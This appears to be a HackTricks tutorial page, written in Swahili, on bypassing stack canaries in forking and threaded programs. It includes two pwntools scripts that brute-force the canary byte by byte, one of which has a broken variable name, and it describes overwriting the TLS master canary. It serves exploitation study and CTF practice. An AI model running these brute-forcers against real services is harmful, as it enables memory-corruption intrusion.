BF Forked & Threaded Stack Canaries

Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)!

Njia nyingine za kusaidia HackTricks:

Ikiwa unataka kuona kampuni yako ikitangazwa kwenye HackTricks au kupakua HackTricks kwa PDF Angalia MIPANGO YA USAJILI!
Pata bidhaa rasmi za PEASS & HackTricks
Gundua Familia ya PEASS, mkusanyiko wetu wa NFTs ya kipekee
Jiunge na 💬 Kikundi cha Discord au kikundi cha telegram au tufuate kwenye Twitter 🐦 @hacktricks_live.
Shiriki mbinu zako za udukuzi kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.

Ikiwa unakabiliana na binary iliyolindwa na canary na PIE (Position Independent Executable) labda unahitaji kupata njia ya kuzipuuza.

Tambua kwamba checksec inaweza isigundue kuwa binary inalindwa na canary ikiwa ilikompiliwa kistatiki na haiwezi kutambua kazi. Hata hivyo, unaweza kugundua hii kwa mkono ikiwa unagundua kwamba thamani imesave kwenye steki mwanzoni mwa wito wa kazi na thamani hii inachunguzwa kabla ya kutoka.

Kupuuza Canary kwa Brute Force

Njia bora ya kuzipuuza canary rahisi ni ikiwa binary ni programu inayoforka michakato ya watoto kila wakati unapounda uhusiano mpya nayo (huduma ya mtandao), kwa sababu kila wakati unapounganisha canary ile ile itatumika.

Kwa hivyo, njia bora ya kuzipuuza canary ni kwa kuzipiga nguvu moja kwa moja kwa kila herufi, na unaweza kugundua ikiwa herufi iliyoguswa ya canary ilikuwa sahihi kwa kuangalia ikiwa programu imeanguka au inaendelea na mtiririko wake wa kawaida. Katika mfano huu, kazi inapiga nguvu 8 Bytes canary (x64) na kutofautisha kati ya herufi iliyoguswa kwa usahihi na herufi mbaya tu kwa kuchunguza ikiwa jibu limetumwa na seva (njia nyingine katika hali nyingine inaweza kuwa kutumia jaribu/kinyume):

Mfano 1

Mfano huu umetekelezwa kwa 64bits lakini unaweza kutekelezwa kwa urahisi kwa bits 32.

from pwn import *

def connect():
r = remote("localhost", 8788)

def get_bf(base):
canary = ""
guess = 0x0
base += canary

while len(canary) < 8:
while guess != 0xff:
r = connect()

r.recvuntil("Username: ")
r.send(base + chr(guess))

if "SOME OUTPUT" in r.clean():
print "Guessed correct byte:", format(guess, '02x')
canary += chr(guess)
base += chr(guess)
guess = 0x0
r.close()
break
else:
guess += 1
r.close()

print "FOUND:\\x" + '\\x'.join("{:02x}".format(ord(c)) for c in canary)
return base

canary_offset = 1176
base = "A" * canary_offset
print("Brute-Forcing canary")
base_canary = get_bf(base) #Get yunk data + canary
CANARY = u64(base_can[len(base_canary)-8:]) #Get the canary

Mfano wa 2

Hii imeboreshwa kwa bits 32, lakini hii inaweza kubadilishwa kwa urahisi kuwa bits 64. Pia eleza kwamba kwa mfano huu programu inatarajia kwanza byte kuonyesha ukubwa wa matokeo na mzigo.

from pwn import *

# Here is the function to brute force the canary
def breakCanary():
known_canary = b""
test_canary = 0x0
len_bytes_to_read = 0x21

for j in range(0, 4):
# Iterate up to 0xff times to brute force all posible values for byte
for test_canary in range(0xff):
print(f"\rTrying canary: {known_canary} {test_canary.to_bytes(1, 'little')}", end="")

# Send the current input size
target.send(len_bytes_to_read.to_bytes(1, "little"))

# Send this iterations canary
target.send(b"0"*0x20 + known_canary + test_canary.to_bytes(1, "little"))

# Scan in the output, determine if we have a correct value
output = target.recvuntil(b"exit.")
if b"YUM" in output:
# If we have a correct value, record the canary value, reset the canary value, and move on
print(" - next byte is: " + hex(test_canary))
known_canary = known_canary + test_canary.to_bytes(1, "little")
len_bytes_to_read += 1
break

# Return the canary
return known_canary

# Start the target process
target = process('./feedme')
#gdb.attach(target)

# Brute force the canary
canary = breakCanary()
log.info(f"The canary is: {canary}")

Vitambulisho

Vitambulisho vya mchakato huo huo pia vitashiriki kipande sawa cha canary, hivyo itakuwa inawezekana kubadilisha canary ikiwa binary inazalisha wimbo mpya kila wakati shambulio linapotokea.

Zaidi ya hayo, kujaza kijazo katika kazi iliyowekwa ulinzi na canary inaweza kutumika kubadilisha canary kuu iliyohifadhiwa kwenye TLS. Hii ni kwa sababu, inaweza kuwa inawezekana kufikia nafasi ya kumbukumbu ambapo TLS inahifadhiwa (na kwa hivyo, canary) kupitia bof kwenye steki ya wimbo. Kama matokeo, kinga ni bure kwa sababu ukaguzi unatumika na vitambulisho viwili ambavyo ni sawa (ingawa vimebadilishwa). Shambulio hili hutekelezwa katika andiko: http://7rocky.github.io/en/ctf/htb-challenges/pwn/robot-factory/#canaries-and-threads

Angalia pia mawasilisho ya https://www.slideshare.net/codeblue_jp/master-canary-forging-by-yuki-koike-code-blue-2015 ambayo inataja kwamba kawaida TLS inahifadhiwa na mmap na wakati steki ya wimbo inapoundwa pia inazalishwa na mmap kulingana na hii, ambayo inaweza kuruhusu kujaza kama ilivyoonyeshwa katika andiko la awali.

Mifano na Marejeo Mengine

https://guyinatuxedo.github.io/07-bof_static/dcquals16_feedme/index.html
Biti 64, hakuna PIE, nx, BF canary, andika kwenye kumbukumbu fulani ROP kuita execve na ruka hapo.

PreviousStack Canaries NextPrint Stack Canary

Last updated 3 days ago